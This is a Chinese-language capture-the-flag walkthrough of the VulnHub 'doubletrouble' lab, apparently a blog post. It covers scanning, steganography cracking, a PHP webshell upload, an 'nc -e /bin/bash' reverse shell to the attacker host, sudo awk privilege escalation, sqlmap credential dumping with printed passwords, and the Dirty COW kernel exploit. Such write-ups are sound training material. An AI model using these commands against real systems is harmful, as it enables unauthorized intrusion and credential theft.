一.环境搭建
1.靶场描述
get flagsdifficulty: easyabout vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.This works better with VirtualBox rather than VMware 2.下载地址
https://www.vulnhub.com/entry/doubletrouble-1,743/![图片[1] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/0bc917103464438b82867c65226f52fb.png)
3.启动靶场
![图片[2] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/7fc568256ef372b85c7d44ce4749fec9.png)
虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.1.0/24
二.渗透测试
1.目标
目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24
2.信息收集
(1)寻找靶场真实ip
nmap -sP 192.168.1.0/24![图片[3] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/2a0eaeac38fdc8f40d0d3f90fb94cc3e.png)
arp-scan -l![图片[4] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/a5473eb7ba46af0c2a93a0fee4bb8b12.png)
靶场IP地址为:192.168.1.11
(2)探测端口及服务
nmap -p- -sV 192.168.1.11![图片[5] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/38fb32a08f744387567367a78d080386.png)
发现开启了22端口, OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)发现开启了80端口, Apache httpd 2.4.38 ((Debian))(3)web指纹识别
whatweb -v 192.168.1.11![图片[6] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/46adb7417bcb416f02278905fbb189f3.png)
扫描到框架是qdPM
3.渗透测试
(1)访问web服务
http://192.168.1.11![图片[7] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/4fa093114b16c50fc901cc9fc8816ede.png)
我们可以看到是qdPM
(2)扫描web服务
1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.1.11![图片[8] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/3e4dc9908ffad24126873fa1e2ee8284.png)
2)nikto扫描网站结构
nikto -h http://192.168.1.11![图片[9] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/4df4c12f1b0069ec2d9140f27477e26c.png)
我们扫描到3个目录,我们一个一个进行访问
http://192.168.1.11/images![图片[10] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/5e155bb87563dec6d567d1bc1b7e2de1.png)
没有任何有用的信息
http://192.168.1.11/secret![图片[11] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/0b3c251d688b28f10eedd71a5f7a14f2.png)
扫描到一个图片,我们先保存下来
http://192.168.1.11/template![图片[12] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/16d6f8a833a669aafe2a5a829bf59d75.png)
3)dirsearch目录扫描
dirsearch -u 192.168.1.11 -e * -x 403 --random-agent![图片[13] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/bea919cf164ac6a7ac330371defaf6d2.png)
目前,我们掌握的信息是一个qdPM9.1框架和一张图片。
(3)渗透测试
1)查找漏洞
我们使用msf查找漏洞,查找到一个漏洞,但是需要密码,这个办法行不通。
![图片[14] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/7873c9f9aa45d927cd7f0a19c3b85d0f.png)
我们使用kali进行查找漏洞,但是漏洞需要密码,还是不行。
![图片[15] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/c1d9e6fe55d23d81563e94630554bfc1.png)
![图片[16] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/7477b98a71108ac829c85bdfd9f9b880.png)
2)图片隐写
我们想到前面有一个图片,我们进行查看
![图片[17] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/f351b4ce4a59f24964848196870fa49a.png)
使用steghide工具先查看一下图片基本信息,但是需要密码,我们没有密码
steghide --info '/home/kali/桌面/doubletrouble.jpg' ![图片[18] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/2726a300475389f7ebef832259477f94.png)
我们使用stegseek进行爆破
stegseek--crack '/home/kali/桌面/doubletrouble.jpg'![图片[19] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/2eed182da5cbb4bdba57ef0d7adba204.png)
看到账号密码,尝试登录
![图片[20] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/92e34d7e62ba055229836067938b808a.png)
我们看到登录成功
3)文件上传
我们进行查找,看有没有可以利用的地方,发现这里有上传点
![图片[21] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/feb29783b09c4ba3b6e281e9d4e3f3ba.png)
![图片[22] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/b17959c9856795e19b9d5a8331123355.png)
我们上传一句话木马,连接蚁剑
![图片[23] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/d3c89a6f3f879a53b781d198549a80ad.png)
![图片[24] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/44aaad7546923fd6ee47ccf99c2575bf.png)
我们可以看到连接成功
http://192.168.1.11/uploads/users/197129-MS02423.php![图片[25] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/832085b3335baf1f12f1953ec612355e.png)
4)反弹shell
nc -e /bin/bash 192.168.1.9 5555![图片[26] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/978076f9c750416622a9e6efd9c72c9f.png)
5)提权
使用sudo -l查看该用户是否具有sudo权限,发现awk可以
![图片[27] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/ee437082fa2db48e404f88fd1fbccd41.png)
发现awk可以进行无密码使用sudo操作
sudo awk 'BEGIN {system("/bin/bash")}'![图片[28] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/d07bc987322b61a13789e78c539484a6.png)
我们进入root查看,发现没有flag,有一个镜像,我们下载下来
![图片[29] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/c71a937ed45e637d3708b12fb7615423.png)
我们把靶机复制到uploads目录下
cp doubletrouble.ova /var/www/html/uploads![图片[30] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/96e957ecccfb2c80469007a4e8b3fa89.png)
因为这个镜像我之前就下载下来了,所以这里我们不用探测ip地址了,ip地址为192.168.1.15
三.第二个镜像
我们知道ip地址为192.168.1.15,前面的步骤和第一个是一样的,这里我就进行简写
1.探测端口及服务
![图片[31] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/bf52f79210013c42ba6829b5db63befc.png)
发现开启了22端口, OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)发现开启了80端口, Apache httpd 2.2.22 ((Debian))2.访问web服务
http://192.168.1.15![图片[32] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/4f156fd77d99990d456d51144dad5d24.png)
我们看到是一个登录页面,一般登录页面要么爆破,要么进行测试SQL注入,这个只能进行SQL注入。
3.SQL注入
(1)测试是否存在SQL注入
首先我们进行抓包
![图片[33] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/0d2539d7cc83ac9d1b741046adeed3b6.png)
![图片[34] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/14984a178ef183f4088c443d36d6dc17.png)
发现存在SQL注入
(2)爆破数据
sqlmap -r '/home/kali/Desktop/MS02423.txt' --dbs --batch![图片[35] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/445a2d1f27a1aa7849db3c35878f842e.png)
sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' --tables --batch![图片[36] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/8ca9351c6d114a775ce5de864eb0e52a.png)
sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' -T 'users' --columns --batch![图片[37] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/1e65edf1b1fb77016b01843fafda56a3.png)
sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' -T 'users' -C 'username,password' --batch --dump![图片[38] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/08e0fe7ecd9477c9bf7701617721c564.png)
最后我们爆破出来2个用户名和密码
montreux GfsZxc1clapton ZubZub99 (3)ssh登录
我们使用2个用户名和密码进行登录,发现页面登录不了
![图片[39] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/2c01ab4176e0752796592e773d26d7b0.png)
前面扫描端口的时候,发现22端口是开放的,我们进行登录试试
![图片[40] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/da5d6677ddcc5f0256831c00f48e1cf9.png)
我们发现montreux登录不了,但是clapton可以
![图片[41] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/d6bf22236707daf65da47c4cc1c9f7ed.png)
我们得到了第一个flag
(4)提权
我们使用sudo -l查看,显示不存在
![图片[42] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/3b8cdb6a83975a7601a8c323e0503053.png)
我们查看内核版本,查找漏洞
uname -a ![图片[43] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/92905820a8f02977688694b34db18c69.png)
查看下系统内核版本信息,发现存在脏牛漏洞,内核版本:3.2.0-4-amd64。
searchsploit linux 3.2searchsploit -m 40616.c 下载![图片[44] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/8cfad8ad12029be3d6a3ce886974370d.png)
我们进行查看40616.c内容, 先使用gcc连接,然后直接使用,后面不用跟其他命令
![图片[45] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/7f90fae11b6309944cd24a86ce644ff3.png)
使用nc传输,将40616.c传输到clapton系统中
在clapton的shell中启动nc接收nc -lvnp 10086 > 40616.c![图片[46] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/16b85cd17b0ca6c159f4fb0cf1d9ebd7.png)
在kali中使用nc上传40616.cnc 192.168.1.15 10086 < 40616.c -w 1![图片[47] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/de8e82e87d1f7060c57c5d40b1a3d447.png)
![图片[48] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/27f80842d945b49b488216867a3d1ab9.png)
我们可以看到传输成功了
我们可以看到40616.c没有执行权限,我们加权限
chmod777 40616.c![图片[49] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/b16ab08ebbcad9e08fa85ad2143c1719.png)
gcc连接,生成可执行程序,进行执行
gcc 40616.c -o 40616.c -pthread./40616.c![图片[50] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/5eeedf49784923dca6c36b174d882bbb.png)
我们可以看到提权成功,查看flag
![图片[51] - vulnhub靶场之doubletrouble - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/3d0efe934c96e6adeeac3fb49b3bdb3c.png)
三.相关资源
1.靶场下载地址
2.nmap
3.arp-scan
4.masscan
5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解
6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)
7.nikto工具的使用
8.dirsearch目录扫描
9.图片隐写
10.文件上传
11.反弹shell
12.SQL注入
13.ssh登录
14.脏牛漏洞
15.gcc
